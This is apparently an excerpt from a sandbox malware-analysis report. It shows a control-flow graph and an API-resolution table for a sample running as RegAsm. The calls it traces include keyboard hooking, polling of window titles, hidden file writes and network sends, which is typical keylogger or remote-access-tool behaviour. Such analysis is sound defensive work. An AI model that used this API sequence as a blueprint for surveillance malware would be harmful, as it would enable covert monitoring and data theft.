54721->54700 54723->54711 54724->54721 54734 40a2f3 54725->54734 54750 40ad11 54728->54750 54792 40a761 54731->54792 54735 40a30c GetModuleHandleA SetWindowsHookExA 54734->54735 54736 40a36e GetMessageA 54734->54736 54735->54736 54738 40a328 GetLastError 54735->54738 54737 40a380 TranslateMessage DispatchMessageA 54736->54737 54739 40a2ab 54736->54739 54737->54736 54737->54739 54740 41bc1f 28 API calls 54738->54740 54741 40a339 54740->54741 54749 4052fd 28 API calls 54741->54749 54778 40ad1f 54750->54778 54751 40a2cd 54752 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 54753 40b93f 28 API calls 54752->54753 54753->54778 54758 41bb77 GetLastInputInfo GetTickCount 54758->54778 54759 40adbf GetWindowTextW 54759->54778 54761 401f09 11 API calls 54761->54778 54762 40b927 28 API calls 54762->54778 54763 40af17 54764 401f09 11 API calls 54763->54764 54764->54751 54765 40ae84 Sleep 54765->54778 54766 441ed1 20 API calls 54766->54778 54768 402093 28 API calls 54768->54778 54769 40ae0c 54771 409097 28 API calls 54769->54771 54769->54778 54788 40b19f 31 API calls new 54769->54788 54771->54769 54773 403014 28 API calls 54773->54778 54774 406383 28 API calls 54774->54778 54776 40a671 12 API calls 54776->54778 54777 41bcef 28 API calls 54777->54778 54778->54751 54778->54752 54778->54758 54778->54759 54778->54761 54778->54762 54778->54763 54778->54765 54778->54766 54778->54768 54778->54769 54778->54773 54778->54774 54778->54776 54778->54777 54779 401fd8 11 API calls 54778->54779 54780 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 54778->54780 54781 401f86 54778->54781 54785 434801 23 API calls __onexit 54778->54785 54786 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 54778->54786 54787 40907f 28 API calls 54778->54787 54789 40b9b7 28 API calls 54778->54789 54790 40b783 40 API calls 2 library calls 54778->54790 54791 4052fd 28 API calls 54778->54791 54779->54778 54782 401f8e 54781->54782 54783 402252 11 API calls 54782->54783 54784 401f99 54783->54784 54784->54778 54785->54778 54786->54778 54787->54778 54788->54769 54789->54778 54790->54778 54793 40a776 Sleep 54792->54793 54813 40a6b0 54793->54813 54795 40a2c1 54796 40a7b6 CreateDirectoryW 54801 40a788 54796->54801 54797 40a7c7 GetFileAttributesW 54797->54801 54798 40a7de SetFileAttributesW 54798->54801 54799 4020df 11 API calls 54809 40a829 54799->54809 54801->54793 54801->54795 54801->54796 54801->54797 54801->54798 54803 401e65 22 API calls 54801->54803 54801->54809 54826 41c482 54801->54826 54802 40a858 PathFileExistsW 54802->54809 54803->54801 54804 4020b7 28 API calls 54804->54809 54806 40a961 SetFileAttributesW 54806->54801 54807 401fd8 11 API calls 54807->54809 54808 406e13 28 API calls 54808->54809 54809->54799 54809->54802 54809->54804 54809->54806 54809->54807 54809->54808 54810 401fe2 28 API calls 54809->54810 54812 401fd8 11 API calls 54809->54812 54836 41c516 CreateFileW 54809->54836 54844 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 54809->54844 54810->54809 54812->54801 54814 40a75d 54813->54814 54816 40a6c6 54813->54816 54814->54801 54815 40a6e5 CreateFileW 54815->54816 54817 40a6f3 GetFileSize 54815->54817 54816->54815 54818 40a728 CloseHandle 54816->54818 54819 40a73a 54816->54819 54820 40a716 54816->54820 54821 40a71d Sleep 54816->54821 54817->54816 54817->54818 54818->54816 54819->54814 54823 409097 28 API calls 54819->54823 54845 40b117 84 API calls 54820->54845 54821->54818 54824 40a756 54823->54824 54825 40a1b4 125 API calls 54824->54825 54825->54814 54827 41c495 CreateFileW 54826->54827 54829 41c4d2 54827->54829 54830 41c4ce 54827->54830 54831 41c4f2 WriteFile 54829->54831 54832 41c4d9 SetFilePointer 54829->54832 54830->54801 54834 41c505 54831->54834 54835 41c507 CloseHandle 54831->54835 54832->54831 54833 41c4e9 CloseHandle 54832->54833 54833->54830 54834->54835 54835->54830 54837 41c540 GetFileSize 54836->54837 54838 41c53c 54836->54838 54846 40244e 54837->54846 54838->54809 54840 41c554 54841 41c566 ReadFile 54840->54841 54842 41c573 54841->54842 54843 41c575 CloseHandle 54841->54843 54842->54843 54843->54838 54844->54809 54845->54821 54847 402456 54846->54847 54849 402460 54847->54849 54850 402a51 28 API calls 54847->54850 54849->54840 54850->54849 54853 40322e 54852->54853 54862 403618 54853->54862 54855 40323b 54855->54687 54857 40326e 54856->54857 54858 402252 11 API calls 54857->54858 54859 403288 54858->54859 54860 402336 11 API calls 54859->54860 54861 403031 54860->54861 54861->54413 54863 403626 54862->54863 54864 403644 54863->54864 54865 40362c 54863->54865 54867 40365c 54864->54867 54868 40369e 54864->54868 54873 4036a6 54865->54873 54869 403642 54867->54869 54872 4027e6 28 API calls 54867->54872 54882 4028a4 22 API calls 54868->54882 54869->54855 54872->54869 54874 402888 22 API calls 54873->54874 54875 4036b9 54874->54875 54876 40372c 54875->54876 54877 4036de 54875->54877 54883 4028a4 22 API calls 54876->54883 54880 4027e6 28 API calls 54877->54880 54881 4036f0 54877->54881 54880->54881 54881->54869 54889 404353 54884->54889 54886 40430a 54887 403262 11 API calls 54886->54887 54888 404319 54887->54888 54888->54421 54890 40435f 54889->54890 54893 404371 54890->54893 54892 40436d 54892->54886 54894 40437f 54893->54894 54895 404385 54894->54895 54896 40439e 54894->54896 54957 4034e6 28 API calls 54895->54957 54897 402888 22 API calls 54896->54897 54898 4043a6 54897->54898 54900 404419 54898->54900 54901 4043bf 54898->54901 54958 4028a4 22 API calls 54900->54958 54903 4027e6 28 API calls 54901->54903 54911 40439c 54901->54911 54903->54911 54911->54892 54957->54911 54960 43ab1a 21 API calls 54959->54960 54961 40170d 54960->54961 54961->54439 54963 4138f4 54962->54963 54964 4138ca RegSetValueExA RegCloseKey 54962->54964 54963->54437 54964->54963 54967 41b98a ctype ___scrt_fastfail 54965->54967 54966 402093 28 API calls 54968 414f84 54966->54968 54967->54966 54968->54446 54969->54463 54971 414f33 54970->54971 54972 414f3d getaddrinfo WSASetLastError 54970->54972 54998 414dc1 29 API calls ___std_exception_copy 54971->54998 54972->54491 54974 414f38 54974->54972 54999 41b847 GlobalMemoryStatusEx 54975->54999 54977 41b886 54977->54491 55000 4145bb 54978->55000 54982 40dde0 54981->54982 54983 41353a 3 API calls 54982->54983 54985 40dde7 54983->54985 54984 40ddff 54984->54491 54985->54984 54986 413584 3 API calls 54985->54986 54986->54984 54988 4020b7 28 API calls 54987->54988 54989 41bce8 54988->54989 54989->54491 54990->54491 54992 402093 28 API calls 54991->54992 54993 40f931 54992->54993 54993->54491 54994->54491 54995->54491 54997->54491 54998->54974 54999->54977 55003 41458e 55000->55003 55004 4145a3 ___scrt_initialize_default_local_stdio_options 55003->55004 55007 43f7ed 55004->55007 55010 43c540 55007->55010 55011 43c580 55010->55011 55012 43c568 55010->55012 55011->55012 55014 43c588 55011->55014 55032 44062d 20 API calls __dosmaperr 55012->55032 55033 43a837 36 API calls 3 library calls 55014->55033 55016 43c598 55034 43ccc6 20 API calls 2 library calls 55016->55034 55017 43c56d _strftime 55025 43502b 55017->55025 55020 43c610 55035 43d334 51 API calls 3 library calls 55020->55035 55021 4145b1 55021->54491 55024 43c61b 55036 43cd30 20 API calls _free 55024->55036 55026 435036 IsProcessorFeaturePresent 55025->55026 55027 435034 55025->55027 55029 435078 55026->55029 55027->55021 55037 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 55029->55037 55031 43515b 55031->55021 55032->55017 55033->55016 55034->55020 55035->55024 55036->55017 55037->55031 55040 40de14 55039->55040 55041 402252 11 API calls 55040->55041 55042 40de1f 55041->55042 55043 4041d9 28 API calls 55042->55043 55044 40dc0b 55043->55044 55045 402fa5 55044->55045 55050 402fb4 55045->55050 55046 402ff6 55056 40323f 55046->55056 55048 402ff4 55049 403262 11 API calls 55048->55049 55051 40300d 55049->55051 55050->55046 55052 402feb 55050->55052 55051->54577 55055 403211 28 API calls 55052->55055 55054->54556 55055->55048 55057 4036a6 28 API calls 55056->55057 55058 40324c 55057->55058 55058->55048 55059->54611 55064 40f7fd 55062->55064 55063 413584 3 API calls 55063->55064 55064->55063 55066 40f8a1 55064->55066 55067 40f891 Sleep 55064->55067 55084 40f82f 55064->55084 55065 409097 28 API calls 55065->55084 55068 409097 28 API calls 55066->55068 55067->55064 55071 40f8ac 55068->55071 55070 41bcef 28 API calls 55070->55084 55072 41bcef 28 API calls 55071->55072 55073 40f8b8 55072->55073 55097 41384f 14 API calls 55073->55097 55076 401f09 11 API calls 55076->55084 55077 40f8cb 55078 401f09 11 API calls 55077->55078 55080 40f8d7 55078->55080 55079 402093 28 API calls 55079->55084 55081 402093 28 API calls 55080->55081 55082 40f8e8 55081->55082 55085 4137aa 14 API calls 55082->55085 55083 4137aa 14 API calls 55083->55084 55084->55065 55084->55067 55084->55070 55084->55076 55084->55079 55084->55083 55095 40d0d1 112 API calls ___scrt_fastfail 55084->55095 55096 41384f 14 API calls 55084->55096 55086 40f8fb 55085->55086 55098 41288b TerminateProcess WaitForSingleObject 55086->55098 55088 40f903 ExitProcess 55099 412829 62 API calls 55091->55099 55096->55084 55097->55077 55098->55088 55100 4129da 55101 4129ec 55100->55101 55102 4041a2 28 API calls 55101->55102 55103 4129ff 55102->55103 55104 4020f6 28 API calls 55103->55104 55105 412a0e 55104->55105 55106 4020f6 28 API calls 55105->55106 55107 412a1d 55106->55107 55108 41beac 28 API calls 55107->55108 55109 412a26 55108->55109 55110 412ace 55109->55110 55111 401e65 22 API calls 55109->55111 55112 401e8d 11 API calls 55110->55112 55113 412a3d 55111->55113 55114 412ad7 55112->55114 55116 4020f6 28 API calls 55113->55116 55115 401fd8 11 API calls 55114->55115 55117 412ae0 55115->55117 55118 412a48 55116->55118 55119 401fd8 11 API calls 55117->55119 55120 401e65 22 API calls 55118->55120 55121 412ae8 55119->55121 55122 412a53 55120->55122 55123 4020f6 28 API calls 55122->55123 55124 412a5e 55123->55124 55125 401e65 22 API calls 55124->55125 55126 412a69 55125->55126 55127 4020f6 28 API calls 55126->55127 55128 412a74 55127->55128 55129 401e65 22 API calls 55128->55129 55130 412a7f 55129->55130 55131 4020f6 28 API calls 55130->55131 55132 412a8a 55131->55132 55133 401e65 22 API calls 55132->55133 55134 412a95 55133->55134 55135 4020f6 28 API calls 55134->55135 55136 412aa0 55135->55136 55137 401e65 22 API calls 55136->55137 55138 412aae 55137->55138 55139 4020f6 28 API calls 55138->55139 55140 412ab9 55139->55140 55144 412aef GetModuleFileNameW 55140->55144 55143 404e26 99 API calls 55143->55110 55145 4020df 11 API calls 55144->55145 55146 412b1a 55145->55146 55147 4020df 11 API calls 55146->55147 55148 412b26 55147->55148 55149 4020df 11 API calls 55148->55149 55171 412b32 55149->55171 55150 40da23 32 API calls 55150->55171 55151 401fd8 11 API calls 55151->55171 55152 41ba09 43 API calls 55152->55171 55153 4185a3 31 API calls 55153->55171 55154 412c58 Sleep 55154->55171 55155 40417e 28 API calls 55155->55171 55156 4042fc 79 API calls 55156->55171 55157 40431d 28 API calls 55157->55171 55158 403014 28 API calls 55158->55171 55159 401f09 11 API calls 55159->55171 55160 412cfa Sleep 55160->55171 55161 412d9c Sleep 55161->55171 55162 41c516 32 API calls 55162->55171 55163 412dff DeleteFileW 55163->55171 55164 412e36 DeleteFileW 55164->55171 55165 412e88 Sleep 55165->55171 55166 412e72 DeleteFileW 55166->55171 55167 412f01 55168 401f09 11 API calls 55167->55168 55169 412f0d 55168->55169 55170 401f09 11 API calls 55169->55170 55172 412f19 55170->55172 55171->55150 55171->55151 55171->55152 55171->55153 55171->55154 55171->55155 55171->55156 55171->55157 55171->55158 55171->55159 55171->55160 55171->55161 55171->55162 55171->55163 55171->55164 55171->55165 55171->55166 55171->55167 55175 412ecd Sleep 55171->55175 55173 401f09 11 API calls 55172->55173 55174 412f25 55173->55174 55176 40b93f 28 API calls 55174->55176 55177 401f09 11 API calls 55175->55177 55178 412f38 55176->55178 55182 412edd 55177->55182 55180 4020f6 28 API calls 55178->55180 55179 401f09 11 API calls 55179->55182 55181 412f58 55180->55181 55291 413268 55181->55291 55182->55171 55182->55179 55184 412eff 55182->55184 55184->55174 55186 401f09 11 API calls 55187 412f6f 55186->55187 55188 4130e3 55187->55188 55189 412f8f 55187->55189 55190 41bdaf 28 API calls 55188->55190 55191 41bdaf 28 API calls 55189->55191 55192 4130ec 55190->55192 55193 412f9b 55191->55193 55194 402f31 28 API calls 55192->55194 55195 41bc1f 28 API calls 55193->55195 55196 413123 55194->55196 55197 412fb5 55195->55197 55198 402f10 28 API calls 55196->55198 55199 402f31 28 API calls 55197->55199 55200 413132 55198->55200 55201 412fe5 55199->55201 55202 402f10 28 API calls 55200->55202 55203 402f10 28 API calls 55201->55203 55204 41313e 55202->55204 55205 412ff4 55203->55205 55206 402f10 28 API calls 55204->55206 55207 402f10 28 API calls 55205->55207 55208 41314d 55206->55208 55209 413003 55207->55209 55210 402f10 28 API calls 55208->55210 55211 402f10 28 API calls 55209->55211 55212 41315c 55210->55212 55213 413012 55211->55213 55214 402f10 28 API calls 55212->55214 55215 402f10 28 API calls 55213->55215 55216 41316b 55214->55216 55217 413021 55215->55217 55218 402f10 28 API calls 55216->55218 55219 402f10 28 API calls 55217->55219 55221 41317a 55218->55221 55220 41302d 55219->55220 55223 402f10 28 API calls 55220->55223 55305 402ea1 28 API calls 55221->55305 55225 413039 55223->55225 55224 413184 55226 404aa1 61 API calls 55224->55226 55303 402ea1 28 API calls 55225->55303 55228 413191 55226->55228 55230 401fd8 11 API calls 55228->55230 55229 413048 55231 402f10 28 API calls 55229->55231 55232 41319d 55230->55232 55233 413054 55231->55233 55234 401fd8 11 API calls 55232->55234 55304 402ea1 28 API calls 55233->55304 55236 4131a9 55234->55236 55238 401fd8 11 API calls 55236->55238 55237 41305e 55239 404aa1 61 API calls 55237->55239 55240 4131b5 55238->55240 55241 41306b 55239->55241 55242 401fd8 11 API calls 55240->55242 55243 401fd8 11 API calls 55241->55243 55244 4131c1 55242->55244 55245 413074 55243->55245 55246 401fd8 11 API calls 55244->55246 55247 401fd8 11 API calls 55245->55247 55248 4131ca 55246->55248 55249 41307d 55247->55249 55250 401fd8 11 API calls 55248->55250 55251 401fd8 11 API calls 55249->55251 55253 4131d3 55250->55253 55252 413086 55251->55252 55255 401fd8 11 API calls 55252->55255 55254 401fd8 11 API calls 55253->55254 55256 4130d7 55254->55256 55257 41308f 55255->55257 55259 401fd8 11 API calls 55256->55259 55258 401fd8 11 API calls 55257->55258 55260 41309b 55258->55260 55261 4131e5 55259->55261 55262 401fd8 11 API calls 55260->55262 55263 401f09 11 API calls 55261->55263 55264 4130a7 55262->55264 55265 4131f1 55263->55265 55266 401fd8 11 API calls 55264->55266 55267 401fd8 11 API calls 55265->55267 55268 4130b3 55266->55268 55269 4131fd 55267->55269 55270 401fd8 11 API calls 55268->55270 55271 401fd8 11 API calls 55269->55271 55272 4130bf 55270->55272 55273 413209 55271->55273 55274 401fd8 11 API calls 55272->55274 55275 401fd8 11 API calls 55273->55275 55276 4130cb 55274->55276 55277 413215 55275->55277 55278 401fd8 11 API calls 55276->55278 55279 401fd8 11 API calls 55277->55279 55278->55256 55280 413221 55279->55280 55281 401fd8 11 API calls 55280->55281 55282 41322d 55281->55282 55283 401fd8 11 API calls 55282->55283 55284 413239 55283->55284 55285 401fd8 11 API calls 55284->55285 55286 413245 55285->55286 55287 401fd8 11 API calls 55286->55287 55288 413251 55287->55288 55289 401fd8 11 API calls 55288->55289 55290 412abe 55289->55290 55290->55143 55292 4132a6 55291->55292 55294 413277 55291->55294 55293 4132b5 55292->55293 55306 10001c5b 55292->55306 55295 40417e 28 API calls 55293->55295 55310 411d2d 55294->55310 55297 4132c1 55295->55297 55298 401fd8 11 API calls 55297->55298 55300 412f63 55298->55300 55300->55186 55303->55229 55304->55237 55305->55224 55307 10001c6b ___scrt_fastfail 55306->55307 55314 100012ee 55307->55314 55309 10001c87 55309->55293 55356 411d39 55310->55356 55313 411fa2 22 API calls new 55313->55292 55315 10001324 ___scrt_fastfail 55314->55315 55316 100013b7 GetEnvironmentVariableW 55315->55316 55340 100010f1 55316->55340 55319 100010f1 57 API calls 55320 10001465 55319->55320 55321 100010f1 57 API calls 55320->55321 55322 10001479 55321->55322 55323 100010f1 57 API calls 55322->55323 55324 1000148d 55323->55324 55325 100010f1 57 API calls 55324->55325 55326 100014a1 55325->55326 55327 100010f1 57 API calls 55326->55327 55328 100014b5 lstrlenW 55327->55328 55329 100014d2 55328->55329 55330 100014d9 lstrlenW 55328->55330 55329->55309 55331 100010f1 57 API calls 55330->55331 55332 10001501 lstrlenW lstrcatW 55331->55332 55333 100010f1 57 API calls 55332->55333 55334 10001539 lstrlenW lstrcatW 55333->55334 55335 100010f1 57 API calls 55334->55335 55336 1000156b lstrlenW lstrcatW 55335->55336 55337 100010f1 57 API calls 55336->55337 55338 1000159d lstrlenW lstrcatW 55337->55338 55339 100010f1 57 API calls 55338->55339 55339->55329 55341 10001118 ___scrt_fastfail 55340->55341 55342 10001129 lstrlenW 55341->55342 55353 10002c40 55342->55353 55344 10001148 lstrcatW lstrlenW 55345 10001177 lstrlenW FindFirstFileW 55344->55345 55346 10001168 lstrlenW 55344->55346 55347 100011a0 55345->55347 55348 100011e1 55345->55348 55346->55345 55349 100011c7 FindNextFileW 55347->55349 55350 100011aa 55347->55350 55348->55319 55349->55347 55352 100011da FindClose 55349->55352 55350->55349 55355 10001000 57 API calls ___scrt_fastfail 55350->55355 55352->55348 55354 10002c57 55353->55354 55354->55344 55354->55354 55355->55350 55389 4117d7 55356->55389 55358 411d57 55359 411d6d SetLastError 55358->55359 55360 4117d7 SetLastError 55358->55360 55386 411d35 55358->55386 55359->55386 55361 411d8a 55360->55361 55361->55359 55363 411dac GetNativeSystemInfo 55361->55363 55361->55386 55364 411df2 55363->55364 55376 411dff SetLastError 55364->55376 55392 411cde VirtualAlloc 55364->55392 55367 411e22 55368 411e47 GetProcessHeap HeapAlloc 55367->55368 55402 411cde VirtualAlloc 55367->55402 55370 411e70 55368->55370 55371 411e5e 55368->55371 55372 4117d7 SetLastError 55370->55372 55403 411cf5 VirtualFree 55371->55403 55375 411eb9 55372->55375 55373 411e3a 55373->55368 55373->55376 55377 411f6b 55375->55377 55393 411cde VirtualAlloc 55375->55393 55376->55386 55404 4120b2 GetProcessHeap HeapFree 55377->55404 55380 411ed2 ctype 55394 4117ea SetLastError ctype ___scrt_fastfail 55380->55394 55382 411efe 55382->55377 55395 411b9a 26 API calls 55382->55395 55384 411f2b 55384->55377 55396 41198a 55384->55396 55386->55313 55387 411f36 55387->55377 55387->55386 55388 411f60 SetLastError 55387->55388 55388->55377 55390 4117e6 55389->55390 55391 4117db SetLastError 55389->55391 55390->55358 55391->55358 55392->55367 55393->55380 55394->55382 55395->55384 55400 4119b0 55396->55400 55397 411a99 55398 4118ed VirtualProtect 55397->55398 55399 411aab 55398->55399 55399->55387 55400->55397 55400->55399 55405 4118ed 55400->55405 55402->55373 55403->55376 55404->55386 55406 4118fe 55405->55406 55408 4118f6 55405->55408 55407 411971 VirtualProtect 55406->55407 55406->55408 55407->55408 55408->55400 55409 42f97e 55410 42f989 55409->55410 55411 42f99d 55410->55411 55413 432f7f 55410->55413 55414 432f8a 55413->55414 55415 432f8e 55413->55415 55414->55411 55417 440f5d 55415->55417 55418 446206 55417->55418 55419 446213 55418->55419 55420 44621e 55418->55420 55430 4461b8 55419->55430 55422 446226 55420->55422 55429 44622f __Getctype 55420->55429 55437 446802 55422->55437 55424 446234 55443 44062d 20 API calls __dosmaperr 55424->55443 55425 446259 HeapReAlloc 55427 44621b 55425->55427 55425->55429 55427->55414 55429->55424 55429->55425 55444 443001 7 API calls 2 library calls 55429->55444 55431 4461f6 55430->55431 55432 4461c6 __Getctype 55430->55432 55446 44062d 20 API calls __dosmaperr 55431->55446 55432->55431 55433 4461e1 RtlAllocateHeap 55432->55433 55445 443001 7 API calls 2 library calls 55432->55445 55433->55432 55435 4461f4 55433->55435 55435->55427 55438 44680d RtlFreeHeap 55437->55438 55439 446836 _free 55437->55439 55438->55439 55440 446822 55438->55440 55439->55427 55447 44062d 20 API calls __dosmaperr 55440->55447 55442 446828 GetLastError 55442->55439 55443->55427 55444->55429 55445->55432 55446->55435 55447->55442 55448 448319 GetLastError 55449 448332 55448->55449 55450 448338 55448->55450 55474 44883c 11 API calls 2 library calls 55449->55474 55454 44838f SetLastError 55450->55454 55467 445b74 55450->55467 55456 448398 55454->55456 55457 448352 55459 446802 _free 17 API calls 55457->55459 55458 448367 55458->55457 55460 44836e 55458->55460 55461 448358 55459->55461 55476 448107 20 API calls _unexpected 55460->55476 55462 448386 SetLastError 55461->55462 55462->55456 55464 448379 55465 446802 _free 17 API calls 55464->55465 55466 44837f 55465->55466 55466->55454 55466->55462 55472 445b81 __Getctype 55467->55472 55468 445bc1 55478 44062d 20 API calls __dosmaperr 55468->55478 55469 445bac RtlAllocateHeap 55470 445bbf 55469->55470 55469->55472 55470->55457 55475 448892 11 API calls 2 library calls 55470->55475 55472->55468 55472->55469 55477 443001 7 API calls 2 library calls 55472->55477 55474->55450 55475->55458 55476->55464 55477->55472 55478->55470 55479 40165e 55480 401666 55479->55480 55481 401669 55479->55481 55482 4016a8 55481->55482 55484 401696 55481->55484 55483 43455e new 22 API calls 55482->55483 55485 40169c 55483->55485 55486 43455e new 22 API calls 55484->55486 55486->55485 55487 426cdc 55492 426d59 send 55487->55492

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                  • API String ID: 4236061018-3687161714
                                                                                  • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                  • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                                  • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                  • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
